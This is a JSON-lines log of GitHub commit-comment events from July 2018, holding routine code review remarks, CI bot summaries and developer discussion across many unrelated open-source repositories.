{"id":"7963983522","type":"CommitCommentEvent","actor":{"login":"seananderson"},"repo":{"name":"fate-ewi/bayesdfa"},"payload":{"comment":{"id":29704388,"position":null,"line":null,"path":null,"commit_id":"041458d9357fc440bd278e5213af4242bb92836b","created_at":"2018-07-13T19:37:23Z","updated_at":"2018-07-13T19:37:23Z","author_association":"MEMBER","body":"I think the errors you were getting on Travis were because of a problem on Travis and had nothing to do with this code. I was getting similar errors on other repositories at the same time."}},"created_at":"2018-07-13T19:37:23Z"}
{"id":"7963985023","type":"CommitCommentEvent","actor":{"login":"cwsmith"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29704390,"position":43,"line":57,"path":"mds/apfPM.cc","commit_id":"9a4fdd14a9f78ca7ad147459d3ac510a0d0c8197","created_at":"2018-07-13T19:37:44Z","updated_at":"2018-07-13T19:37:44Z","author_association":"CONTRIBUTOR","body":"same as above"}},"created_at":"2018-07-13T19:37:44Z"}
{"id":"7963985442","type":"CommitCommentEvent","actor":{"login":"crtlib"},"repo":{"name":"symfony/console"},"payload":{"comment":{"id":29704392,"position":null,"line":null,"path":null,"commit_id":"7afe26f4eca9b4fb2009c4a5b035f74ed2872807","created_at":"2018-07-13T19:37:51Z","updated_at":"2018-07-13T19:37:51Z","author_association":"NONE","body":"Great! Thanks!"}},"created_at":"2018-07-13T19:37:51Z"}
{"id":"7963987905","type":"CommitCommentEvent","actor":{"login":"cwsmith"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29704396,"position":50,"line":64,"path":"mds/apfPM.cc","commit_id":"9a4fdd14a9f78ca7ad147459d3ac510a0d0c8197","created_at":"2018-07-13T19:38:28Z","updated_at":"2018-07-13T19:38:28Z","author_association":"CONTRIBUTOR","body":"can this be removed?"}},"created_at":"2018-07-13T19:38:28Z"}
{"id":"7963988645","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29704399,"position":null,"line":null,"path":null,"commit_id":"3a7380edcf8da78b6a85b45304682faa942b25dd","created_at":"2018-07-13T19:38:40Z","updated_at":"2018-07-13T19:38:40Z","author_association":"NONE","body":"## Global\n\n| Changed          |   Status |\n|:-----------------|---------:|\n| `coverage`       |     0.03 |\n| `metadata_total` |     1    |\n| `nodes_count`    |     1    |\n| `texts_total`    |     1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |    +1497 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0086/tlg045/__cts__.xml`                     | New      |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc2.xml` | New      |\n| `./data/tlg0086/tlg045/__cts__.xml`                     | Failing  |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc2.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4454)*\n"}},"created_at":"2018-07-13T19:38:40Z"}
{"id":"7963989296","type":"CommitCommentEvent","actor":{"login":"cwsmith"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29704401,"position":13,"line":27,"path":"mds/apfPM.h","commit_id":"9a4fdd14a9f78ca7ad147459d3ac510a0d0c8197","created_at":"2018-07-13T19:38:49Z","updated_at":"2018-07-13T19:38:49Z","author_association":"CONTRIBUTOR","body":"can this be removed?\r\n\r\n"}},"created_at":"2018-07-13T19:38:49Z"}
{"id":"7963990434","type":"CommitCommentEvent","actor":{"login":"jordy-ruiz"},"repo":{"name":"matricks/bam"},"payload":{"comment":{"id":29704402,"position":null,"line":null,"path":null,"commit_id":"10c0f237800fbf4599eb291cdf1cd9cf1914e7be","created_at":"2018-07-13T19:39:06Z","updated_at":"2018-07-13T19:39:06Z","author_association":"NONE","body":"Just xdot :/\r\nAdmittedly I only use it for medium-sized projects, about ~50 C++ files (max).\r\nI get that for something bigger, the graph is just a mess. And since stuff like circular dependencies puzzles mostly happens on bigger projects, that's most of the use cases, right...\r\n\r\nThe feature is cool and I like to use it to showcase bam a bit when someone asks, but eh, if it clutters the options, so be it :-)"}},"created_at":"2018-07-13T19:39:06Z"}
{"id":"7963992299","type":"CommitCommentEvent","actor":{"login":"seananderson"},"repo":{"name":"fate-ewi/bayesdfa"},"payload":{"comment":{"id":29704406,"position":null,"line":null,"path":null,"commit_id":"4219a0e7460b41e47e5abe4790f45c1a2f9efb58","created_at":"2018-07-13T19:39:34Z","updated_at":"2018-07-13T19:39:34Z","author_association":"MEMBER","body":"My current favourite 'styling' package is styler:\r\nhttp://styler.r-lib.org/\r\n\r\nEven has a nice 'Addin' drop-down menu in RStudio."}},"created_at":"2018-07-13T19:39:34Z"}
{"id":"7963995473","type":"CommitCommentEvent","actor":{"login":"nirbhayc"},"repo":{"name":"bloomberg/comdb2"},"payload":{"comment":{"id":29704412,"position":5,"line":102,"path":"CMakeLists.txt","commit_id":"34ba2bf5e8c0a53d7bee8a79d8f78eb6f9acd1a1","created_at":"2018-07-13T19:40:19Z","updated_at":"2018-07-13T19:40:19Z","author_association":"COLLABORATOR","body":"Once and for all!"}},"created_at":"2018-07-13T19:40:19Z"}
{"id":"7963995615","type":"CommitCommentEvent","actor":{"login":"georgejipa"},"repo":{"name":"Designmodocom/WP-Maintenance-Mode"},"payload":{"comment":{"id":29704415,"position":null,"line":null,"path":null,"commit_id":"ec5009eaebfa8b13b3b3782d2973031148f5886d","created_at":"2018-07-13T19:40:21Z","updated_at":"2018-07-13T19:40:21Z","author_association":"CONTRIBUTOR","body":"don't forget to bump the version constant from here: https://github.com/Designmodocom/WP-Maintenance-Mode/blob/master/includes/classes/wp-maintenance-mode.php#L7"}},"created_at":"2018-07-13T19:40:21Z"}
{"id":"7963996141","type":"CommitCommentEvent","actor":{"login":"md2perpe"},"repo":{"name":"chubin/cheat.sh"},"payload":{"comment":{"id":29704416,"position":34,"line":20,"path":"bin/srv.py","commit_id":"26e102fc169c282021de11942be3c2c919adcefa","created_at":"2018-07-13T19:40:29Z","updated_at":"2018-07-13T19:40:29Z","author_association":"NONE","body":"Should it really be `'__file__'`? Shouldn't it be just `__file__` without apostrophees:\r\n\r\n```python\r\nMYDIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\r\n```"}},"created_at":"2018-07-13T19:40:29Z"}
{"id":"7963996983","type":"CommitCommentEvent","actor":{"login":"Vultraz"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29704419,"position":21,"line":82,"path":"src/gui/widgets/tree_view.cpp","commit_id":"e247892616aca160fea8df5d34fcca52c891baf2","created_at":"2018-07-13T19:40:41Z","updated_at":"2018-07-13T19:40:41Z","author_association":"MEMBER","body":"I need `std::move` else compilation fails."}},"created_at":"2018-07-13T19:40:41Z"}
{"id":"7963997759","type":"CommitCommentEvent","actor":{"login":"akshatsikarwar"},"repo":{"name":"bloomberg/comdb2"},"payload":{"comment":{"id":29704421,"position":5,"line":102,"path":"CMakeLists.txt","commit_id":"34ba2bf5e8c0a53d7bee8a79d8f78eb6f9acd1a1","created_at":"2018-07-13T19:40:52Z","updated_at":"2018-07-13T19:40:52Z","author_association":"COLLABORATOR","body":"Totes"}},"created_at":"2018-07-13T19:40:52Z"}
{"id":"7964000682","type":"CommitCommentEvent","actor":{"login":"cwsmith"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29704422,"position":4,"line":18,"path":"mds/apfPM.cc","commit_id":"9a4fdd14a9f78ca7ad147459d3ac510a0d0c8197","created_at":"2018-07-13T19:41:35Z","updated_at":"2018-07-13T19:41:35Z","author_association":"CONTRIBUTOR","body":"Can this be associated with the mesh or partition model object instead of a global var?  I'm familiar with this part of the code... global vars scare me though."}},"created_at":"2018-07-13T19:41:35Z"}
{"id":"7964002731","type":"CommitCommentEvent","actor":{"login":"robertbira"},"repo":{"name":"nodejs/i18n"},"payload":{"comment":{"id":29704429,"position":4,"line":142,"path":"content/v10.x/it-IT/doc/api/addons.md","commit_id":"7b2c476937b2c39d311e10af4c367f5efffb3a3f","created_at":"2018-07-13T19:42:04Z","updated_at":"2018-07-13T19:42:04Z","author_association":"NONE","body":"I'm the italian translator of your project. \r\nMaybe there is a typo in this line \"This API will be Application Binary Interface (ABI) stable across version of Node.js.\" about \"version\", it would be \"versions\" like in n-api.md file."}},"created_at":"2018-07-13T19:42:04Z"}
{"id":"7964003033","type":"CommitCommentEvent","actor":{"login":"asmorodin-slalom"},"repo":{"name":"asmorodin-slalom/CodeReview"},"payload":{"comment":{"id":29704430,"position":null,"line":null,"path":null,"commit_id":"f0cadcde4be362fb172bffc4e1726ff9aa8f89cf","created_at":"2018-07-13T19:42:09Z","updated_at":"2018-07-13T19:42:09Z","author_association":"OWNER","body":"Passed"}},"created_at":"2018-07-13T19:42:09Z"}
{"id":"7964003783","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29704433,"position":null,"line":null,"path":null,"commit_id":"13a6eb9e5323ea7b518784b9b2a1f7dd55778cae","created_at":"2018-07-13T19:42:19Z","updated_at":"2018-07-13T19:42:19Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-747](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-747).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-747-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T19:42:19Z"}
{"id":"7964004305","type":"CommitCommentEvent","actor":{"login":"EthanBullVulpe"},"repo":{"name":"paesanilab/potential_fitting"},"payload":{"comment":{"id":29704435,"position":6,"line":18,"path":"configuration_generator/src/qcalc.py","commit_id":"4148b128afa120a828294abc59db61de90a2ba70","created_at":"2018-07-13T19:42:25Z","updated_at":"2018-07-13T19:42:25Z","author_association":"COLLABORATOR","body":"Yep absolutelty. This should be changed."}},"created_at":"2018-07-13T19:42:25Z"}
{"id":"7964006983","type":"CommitCommentEvent","actor":{"login":"cwsmith"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29704438,"position":38,"line":653,"path":"mds/apfMDS.cc","commit_id":"9a4fdd14a9f78ca7ad147459d3ac510a0d0c8197","created_at":"2018-07-13T19:43:07Z","updated_at":"2018-07-13T19:43:07Z","author_association":"CONTRIBUTOR","body":"please remove this"}},"created_at":"2018-07-13T19:43:07Z"}
{"id":"7964008018","type":"CommitCommentEvent","actor":{"login":"mbabker"},"repo":{"name":"joomla-framework/database"},"payload":{"comment":{"id":29704441,"position":null,"line":null,"path":null,"commit_id":"25508b8608b66a790bc48b04915f6edd29814ff0","created_at":"2018-07-13T19:43:22Z","updated_at":"2018-07-13T19:43:22Z","author_association":"MEMBER","body":"Look.  I honestly don't care either way about this issue anymore.  I removed the option so that people can do whatever they please.  Personally, I'm not doing much development using Joomla these days, so it honestly doesn't impact me, and it's not like my queries or the performance of my applications and components using the Joomla Database API hinged on whether this option was enabled.  So you all can have your way, really.\r\n\r\nI'm going to tell you the best thing to happen to me in 2018.  Spending 3 months dealing with a major depression.  Because it made me realize that I honestly don't have a passion for contributing to or having a voice in steering Joomla's direction anymore.  I'm really only here because there is nobody else insane enough to try and do a lot of the things I do (really, who else would've spent the effort to make the database API support prepared statements across the board, and now being realistic how much of the extension ecosystem is actually going to adopt that work?).  As long as my company has clients whose public facing platforms are built on top of Joomla though, I have a vested interest in ensuring the platform doesn't go to hell in a handbasket, and that's why I won't shut up about strong code standards or strong APIs done correctly or accepting patches that are nothing more than hack jobs across the project.\r\n\r\nAnd yeah, I've been written off as a troll by a fair number of project contributors thanks to my blunt commentary.  Like it or not, I'm not going to sugarcoat my feelings about things toward people or the state of Joomla, and apparently it pisses a lot of people off that I just don't shut up and drink the Kool-Aid."}},"created_at":"2018-07-13T19:43:22Z"}
{"id":"7964009126","type":"CommitCommentEvent","actor":{"login":"Etaglibash"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29704445,"position":null,"line":null,"path":null,"commit_id":"6535e01c2b6bebb73183aed1ce01ba85d03579f4","created_at":"2018-07-13T19:43:38Z","updated_at":"2018-07-13T19:43:38Z","author_association":"CONTRIBUTOR","body":"cierto... parece que tenía una versión anticuada del archivo, sólo quería cambiar una línea."}},"created_at":"2018-07-13T19:43:38Z"}
{"id":"7964009311","type":"CommitCommentEvent","actor":{"login":"vinisantannaa"},"repo":{"name":"GrimReio/OpenIAB-sample-game"},"payload":{"comment":{"id":29704446,"position":null,"line":null,"path":null,"commit_id":"25e4c2b9c1f88b9096881ad1c88aff0f69321248","created_at":"2018-07-13T19:43:41Z","updated_at":"2018-07-13T19:43:41Z","author_association":"NONE","body":"I downloaded the OpenIAB purchase plugin. Every time I start the application, it opens a Manifest with the background of the plugin, I wanted to remove it. This background is the same that appears when I send a purchase. How do I remove the background from this manifest?"}},"created_at":"2018-07-13T19:43:41Z"}
{"id":"7964014988","type":"CommitCommentEvent","actor":{"login":"PsycholoG-ZxZ"},"repo":{"name":"bmstu-iu9/utp2018-8-flowcharts"},"payload":{"comment":{"id":29704463,"position":null,"line":null,"path":null,"commit_id":"2e4e46298e7b5624dd1c54f8ff634b1ab0273a0c","created_at":"2018-07-13T19:45:05Z","updated_at":"2018-07-13T19:45:05Z","author_association":"CONTRIBUTOR","body":"Коммит сделал PsycholoG-ZxZ,  неверно залогинил гит в консоли :1st_place_medal: "}},"created_at":"2018-07-13T19:45:05Z"}
{"id":"7964019233","type":"CommitCommentEvent","actor":{"login":"mashedcode"},"repo":{"name":"Mailu/Mailu"},"payload":{"comment":{"id":29704479,"position":14,"line":16,"path":"postfix/conf/master.cf","commit_id":"a11eb4ba35530595b379ef95b239d4c04ee3e227","created_at":"2018-07-13T19:46:06Z","updated_at":"2018-07-13T19:46:06Z","author_association":"NONE","body":"Why was this removed? This doesn't seem to belong into this commit."}},"created_at":"2018-07-13T19:46:06Z"}
{"id":"7964020209","type":"CommitCommentEvent","actor":{"login":"vinisantannaa"},"repo":{"name":"kirich1409/SvgGlidePlugins"},"payload":{"comment":{"id":29704483,"position":null,"line":null,"path":null,"commit_id":"1198ef3c96e0078ee530c2fb76b9b986b67dc2e9","created_at":"2018-07-13T19:46:19Z","updated_at":"2018-07-13T19:46:19Z","author_association":"NONE","body":"\r\nSorry, it's not the theme ... I downloaded the OpenIAB purchase plugin. Every time I start the application, it opens a Manifest with the background of the plugin, I wanted to remove it. This background is the same that appears when I send a purchase. How do I remove the background from this manifest?"}},"created_at":"2018-07-13T19:46:19Z"}
{"id":"7964021655","type":"CommitCommentEvent","actor":{"login":"SirCmpwn"},"repo":{"name":"swaywm/wlroots"},"payload":{"comment":{"id":29704485,"position":null,"line":null,"path":null,"commit_id":"a0afedcd8fbeb2013252e629d524aa83cdd9326e","created_at":"2018-07-13T19:46:39Z","updated_at":"2018-07-13T19:46:39Z","author_association":"MEMBER","body":"derp"}},"created_at":"2018-07-13T19:46:39Z"}
{"id":"7964024001","type":"CommitCommentEvent","actor":{"login":"ggppdk"},"repo":{"name":"joomla-framework/database"},"payload":{"comment":{"id":29704494,"position":null,"line":null,"path":null,"commit_id":"25508b8608b66a790bc48b04915f6edd29814ff0","created_at":"2018-07-13T19:47:14Z","updated_at":"2018-07-13T19:47:14Z","author_association":"NONE","body":"@mbabker \r\n\r\nyour works, efforts and ...time has been most valuable, here, nobody here said otherwise "}},"created_at":"2018-07-13T19:47:14Z"}
{"id":"7964024695","type":"CommitCommentEvent","actor":{"login":"georgejipa"},"repo":{"name":"Designmodocom/WP-Maintenance-Mode"},"payload":{"comment":{"id":29704497,"position":null,"line":null,"path":null,"commit_id":"f434934ec7e2a7d82567084f1dc25a12315a966b","created_at":"2018-07-13T19:47:24Z","updated_at":"2018-07-13T19:47:24Z","author_association":"CONTRIBUTOR","body":"thanks! you should also update the release tag :)"}},"created_at":"2018-07-13T19:47:24Z"}
{"id":"7964030520","type":"CommitCommentEvent","actor":{"login":"AnvarGear"},"repo":{"name":"SwoonEditions/voyager-frontend"},"payload":{"comment":{"id":29704512,"position":null,"line":null,"path":null,"commit_id":"dede5f6057fa37be9103ec249bd0605964d584fc","created_at":"2018-07-13T19:48:48Z","updated_at":"2018-07-13T19:48:48Z","author_association":"NONE","body":"I I have reviewed it in a new installation and it worked for me.\r\nMySQL: 5.7.22-0ubuntu0.16.04.1 - (Ubuntu) / Apache: 2.4.18 (Ubuntu) / PHP: 7.1.19"}},"created_at":"2018-07-13T19:48:48Z"}
{"id":"7964032650","type":"CommitCommentEvent","actor":{"login":"jdcasey"},"repo":{"name":"ligangty/indy"},"payload":{"comment":{"id":29704518,"position":null,"line":null,"path":null,"commit_id":"0034620a5186f9e6457d328690c596ece0a3098b","created_at":"2018-07-13T19:49:19Z","updated_at":"2018-07-13T19:49:19Z","author_association":"NONE","body":"If this shows how the group-level indexed entry can return the store-level entry, can we make this a new ftest to prevent regression?"}},"created_at":"2018-07-13T19:49:19Z"}
{"id":"7964032656","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29704517,"position":21,"line":82,"path":"src/gui/widgets/tree_view.cpp","commit_id":"e247892616aca160fea8df5d34fcca52c891baf2","created_at":"2018-07-13T19:49:19Z","updated_at":"2018-07-13T19:49:19Z","author_association":"MEMBER","body":"Ah, right. You're move constructing a `unique_ptr` here.\r\n\r\nI think this would make the intention more clear, though:\r\n\r\n```cpp\r\ntree_view_node::ptr_t old_node(std::move(*node_itor));\r\n```\r\n\r\nIn other words, the local object construction syntax instead of assignment syntax."}},"created_at":"2018-07-13T19:49:19Z"}
{"id":"7964034158","type":"CommitCommentEvent","actor":{"login":"zreedeecom"},"repo":{"name":"Designmodocom/WP-Maintenance-Mode"},"payload":{"comment":{"id":29704521,"position":null,"line":null,"path":null,"commit_id":"f434934ec7e2a7d82567084f1dc25a12315a966b","created_at":"2018-07-13T19:49:43Z","updated_at":"2018-07-13T19:49:43Z","author_association":"COLLABORATOR","body":"I did it! but for some reason is not including last commit, gonna try again"}},"created_at":"2018-07-13T19:49:43Z"}
{"id":"7964038040","type":"CommitCommentEvent","actor":{"login":"tbair82"},"repo":{"name":"tbair82/n-cube"},"payload":{"comment":{"id":29704530,"position":null,"line":null,"path":null,"commit_id":"97b222019b3294f1774de83bc65f707afb517168","created_at":"2018-07-13T19:50:39Z","updated_at":"2018-07-13T19:50:39Z","author_association":"OWNER","body":"Remove redundant asSnapshot() from NCubeRuntime in conjuction with corresponding addition of asSnapshot() in ApplicationID asBootVersion()"}},"created_at":"2018-07-13T19:50:39Z"}
{"id":"7964038987","type":"CommitCommentEvent","actor":{"login":"n3npq"},"repo":{"name":"rpm-software-management/rpm"},"payload":{"comment":{"id":29704533,"position":null,"line":null,"path":null,"commit_id":"60cbee157611875357d053f7fcdcb973c9625589","created_at":"2018-07-13T19:50:52Z","updated_at":"2018-07-13T19:50:52Z","author_association":"CONTRIBUTOR","body":"Cloning an existing API seems a sub-optimal solution unless one is getting paid per LOC changed.\r\n\r\nInstead, steal some 1-3 unused bits and mask on a implementation \"version\" using the existing API."}},"created_at":"2018-07-13T19:50:52Z"}
{"id":"7964042002","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704538,"position":35,"line":201,"path":"prov/mrail/src/mrail.h","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T19:51:38Z","updated_at":"2018-07-13T19:51:38Z","author_association":"NONE","body":"When the msg requests merge with this, these may need to be renamed."}},"created_at":"2018-07-13T19:51:38Z"}
{"id":"7964043631","type":"CommitCommentEvent","actor":{"login":"wsalesky"},"repo":{"name":"srophe/srophe-app-data"},"payload":{"comment":{"id":29704545,"position":null,"line":null,"path":null,"commit_id":"9f1c3033c6729be2fa97a26cd525f509a97bd06b","created_at":"2018-07-13T19:52:03Z","updated_at":"2018-07-13T19:52:03Z","author_association":"CONTRIBUTOR","body":"@dlschwartz thanks. I will be rerunning the RDF this weekend"}},"created_at":"2018-07-13T19:52:03Z"}
{"id":"7964049446","type":"CommitCommentEvent","actor":{"login":"PhocaCz"},"repo":{"name":"joomla-framework/database"},"payload":{"comment":{"id":29704559,"position":null,"line":null,"path":null,"commit_id":"25508b8608b66a790bc48b04915f6edd29814ff0","created_at":"2018-07-13T19:53:23Z","updated_at":"2018-07-13T19:53:23Z","author_association":"NONE","body":"I personally use ONLY_FULL_GROUP_BY but I see problems like\r\n- performance issues\r\n- complicated SQL query building\r\n- problems regarding ORM method (applying group by on * is really pain)\r\n\r\nI just created a parameter to switch off the full group by rule because of performance issues.\r\n\r\nYes I can agree, these arguments are not enough to disable this strict rule. But what I'm afraid of is that Joomla! will lose a lot of extensions just because the developers will be not able to overwrite their SQL queries to fit this too much strict rule :-( We can see it every time when new Joomla! \"big\" version is released. Many extensions are lost, so why to lose them because of really not important strict rule :-("}},"created_at":"2018-07-13T19:53:23Z"}
{"id":"7964049475","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704560,"position":50,"line":288,"path":"prov/mrail/src/mrail.h","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T19:53:23Z","updated_at":"2018-07-13T19:53:23Z","author_association":"NONE","body":"Can we drop the macro?  We're defining a 1 line function...  The indirection makes it harder to read the code, since the human must construct the function."}},"created_at":"2018-07-13T19:53:23Z"}
{"id":"7964053435","type":"CommitCommentEvent","actor":{"login":"jiekang"},"repo":{"name":"aptmac/fabric8-ui"},"payload":{"comment":{"id":29704575,"position":44,"line":72,"path":"src/app/dashboard-widgets/work-item-widget/work-item-widget.component.ts","commit_id":"c38275644cc1fda720cc01f1f16e7f6294798ba5","created_at":"2018-07-13T19:54:23Z","updated_at":"2018-07-13T19:54:23Z","author_association":"NONE","body":"@aptmac Do `this.myWorkItemsOpen = this.myWorkItemsInProgress = this.myWorkItemsResolved = 0;` heehee."}},"created_at":"2018-07-13T19:54:23Z"}
{"id":"7964054447","type":"CommitCommentEvent","actor":{"login":"ulisescolina"},"repo":{"name":"ulisescolina/UC-SD"},"payload":{"comment":{"id":29704578,"position":null,"line":null,"path":null,"commit_id":"c3a79ea13bbd6d252c3852748ba5409a0dc2d85a","created_at":"2018-07-13T19:54:38Z","updated_at":"2018-07-13T19:54:38Z","author_association":"OWNER","body":"**El proyecto se sincroniza en este estado dado a la posibilidad de perdida inminente de archivos dado el mal funcionamiento de una de las maquinas de los desarrolladores, de esta manera el proyecto no se pierde por completo una segunda vez**"}},"created_at":"2018-07-13T19:54:38Z"}
{"id":"7964057851","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29704587,"position":null,"line":null,"path":null,"commit_id":"5ebedc8789bcffc20eabc465ac0eb55e0305b6a9","created_at":"2018-07-13T19:55:27Z","updated_at":"2018-07-13T19:55:27Z","author_association":"NONE","body":"Sorry, I made a mistake to suggest to fixup the commit I indicated. This change should have fixed up 454e09ef9fc92545a963b21c653f6a58890ed9c4 instead: the `switch` must come *after* testing whether there is an action without a rebase in progress, not before."}},"created_at":"2018-07-13T19:55:27Z"}
{"id":"7964058741","type":"CommitCommentEvent","actor":{"login":"zreedeecom"},"repo":{"name":"Designmodocom/WP-Maintenance-Mode"},"payload":{"comment":{"id":29704590,"position":null,"line":null,"path":null,"commit_id":"f434934ec7e2a7d82567084f1dc25a12315a966b","created_at":"2018-07-13T19:55:38Z","updated_at":"2018-07-13T19:55:38Z","author_association":"COLLABORATOR","body":"Now it's ok. Thanks for pointing out."}},"created_at":"2018-07-13T19:55:38Z"}
{"id":"7964059613","type":"CommitCommentEvent","actor":{"login":"mohancm"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":29704596,"position":null,"line":null,"path":null,"commit_id":"d5f249f25fdc40c452f14f1b2bf45ccc335d6ace","created_at":"2018-07-13T19:55:51Z","updated_at":"2018-07-13T19:55:51Z","author_association":"NONE","body":"Lmao 😂"}},"created_at":"2018-07-13T19:55:51Z"}
{"id":"7964062133","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29704598,"position":null,"line":null,"path":null,"commit_id":"5ebedc8789bcffc20eabc465ac0eb55e0305b6a9","created_at":"2018-07-13T19:56:25Z","updated_at":"2018-07-13T19:56:25Z","author_association":"NONE","body":"(The easiest way to fix this is probably to run yet another interactive rebase and mark that commit as `edit`, then move the code manually, amend, continue, and resolve the inevitable merge conflicts."}},"created_at":"2018-07-13T19:56:25Z"}
{"id":"7964062934","type":"CommitCommentEvent","actor":{"login":"jiekang"},"repo":{"name":"aptmac/fabric8-ui"},"payload":{"comment":{"id":29704600,"position":50,"line":78,"path":"src/app/dashboard-widgets/work-item-widget/work-item-widget.component.ts","commit_id":"c38275644cc1fda720cc01f1f16e7f6294798ba5","created_at":"2018-07-13T19:56:36Z","updated_at":"2018-07-13T19:56:36Z","author_association":"NONE","body":"That magic number is amazing."}},"created_at":"2018-07-13T19:56:36Z"}
{"id":"7964064682","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29704603,"position":null,"line":null,"path":null,"commit_id":"43cb497705b962ba9d15757911af85ef29fda608","created_at":"2018-07-13T19:57:00Z","updated_at":"2018-07-13T19:57:00Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-199](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-199).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-199-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T19:57:00Z"}
{"id":"7964068278","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704616,"position":75,"line":313,"path":"prov/mrail/src/mrail.h","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T19:57:47Z","updated_at":"2018-07-13T19:57:47Z","author_association":"NONE","body":"count and posted can be ints.  Why is remaining_subcomps needed an atomic?  Doesn't count - posted = remaining?  If count is the size of the subreq array, it isn't needed per request, but per request pool"}},"created_at":"2018-07-13T19:57:47Z"}
{"id":"7964068480","type":"CommitCommentEvent","actor":{"login":"jiekang"},"repo":{"name":"aptmac/fabric8-ui"},"payload":{"comment":{"id":29704619,"position":11,"line":22,"path":"src/app/dashboard-widgets/work-item-widget/work-item-widget.component.ts","commit_id":"c38275644cc1fda720cc01f1f16e7f6294798ba5","created_at":"2018-07-13T19:57:50Z","updated_at":"2018-07-13T19:57:50Z","author_association":"NONE","body":"Make this just `WorkItem[]` and the count just a `number` as well and set them in your subscription; the `PublishReplay` should not be needed."}},"created_at":"2018-07-13T19:57:50Z"}
{"id":"7964068556","type":"CommitCommentEvent","actor":{"login":"aptmac"},"repo":{"name":"aptmac/fabric8-ui"},"payload":{"comment":{"id":29704620,"position":44,"line":72,"path":"src/app/dashboard-widgets/work-item-widget/work-item-widget.component.ts","commit_id":"c38275644cc1fda720cc01f1f16e7f6294798ba5","created_at":"2018-07-13T19:57:52Z","updated_at":"2018-07-13T19:57:52Z","author_association":"OWNER","body":"Smooth, yeah I'll touch that up."}},"created_at":"2018-07-13T19:57:52Z"}
{"id":"7964072485","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29704629,"position":null,"line":null,"path":null,"commit_id":"529d29ecf4cebb7d9f61b9a2693c58b2f3ceb8c9","created_at":"2018-07-13T19:58:47Z","updated_at":"2018-07-13T19:58:47Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.11 |\n| `metadata_passing` |     2    |\n| `metadata_total`   |    -6    |\n| `nodes_count`      |     2    |\n| `texts_passing`    |     1    |\n| `texts_total`      |    -3    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |       +4 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/phi0010/__cts__.xml`                            | Deleted  |\n| `./data/phi0010/tlg001/__cts__.xml`                     | Deleted  |\n| `./data/phi0010/tlg0010/__cts__.xml`                    | Deleted  |\n| `./data/tlg0006/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg003/__cts__.xml`                     | Deleted  |\n| `./data/tlg0019/tlg006/tlg0019.tlg006.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0006/tlg011/__cts__.xml`                     | Passing  |\n| `./data/tlg0019/tlg006/__cts__.xml`                     | Passing  |\n| `./data/tlg0086/tlg045/__cts__.xml`                     | Passing  |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc2.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4455)*\n"}},"created_at":"2018-07-13T19:58:47Z"}
